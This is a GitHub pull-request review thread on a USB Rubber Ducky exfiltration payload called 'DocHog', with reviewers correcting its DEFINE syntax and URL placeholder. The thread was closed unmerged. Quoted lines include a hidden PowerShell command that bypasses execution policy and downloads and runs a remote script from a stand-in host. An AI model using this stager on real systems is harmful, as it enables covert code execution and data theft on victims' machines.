New Payload - DocHog
hak5/usbrubberducky-payloads pull request #366
Opened 2023-07-13 19:56 UTC by atomiczsec

2023-10-16 11:12 UTC, dallaswinger commented on payloads/library/exfiltration/Doc-Hog/payload.txt
> +DEFINE URL http://new-url.com/powershell.ps1
https://github.com/hak5/usbrubberducky-payloads#including-urls

2023-10-16 11:12 UTC, dallaswinger commented on payloads/library/exfiltration/Doc-Hog/payload.txt
> +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl
this references `$URL` but your DEFINE is `URL` and should be `#URL`

2023-11-13 16:16 UTC, atomiczsec commented
@dallaswinger Here is the updated version, please lmk if there needs to be anything else done!

2024-06-07 18:48 UTC, hak5peaks requested changes

2024-06-07 18:48 UTC, hak5peaks commented on payloads/library/exfiltration/Doc-Hog/payload.txt
> +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr URL dl=1; iex $pl
(Assuming you are attempting to call your definition for #URL) you need to have a `#` to call your definition

```
  STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URL dl=1; iex $pl
```

2024-06-07 18:52 UTC, hak5peaks commented on payloads/library/exfiltration/Doc-Hog/payload.txt
> +DEFINE #URL http://new-url.com/powershell.ps1
Please change this to ```example.com``` 

>Including URLs
URLs used for retrieving staged code should refer exclusively to example.com using DEFINE in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration).

2025-01-05 19:32 UTC, closed without merging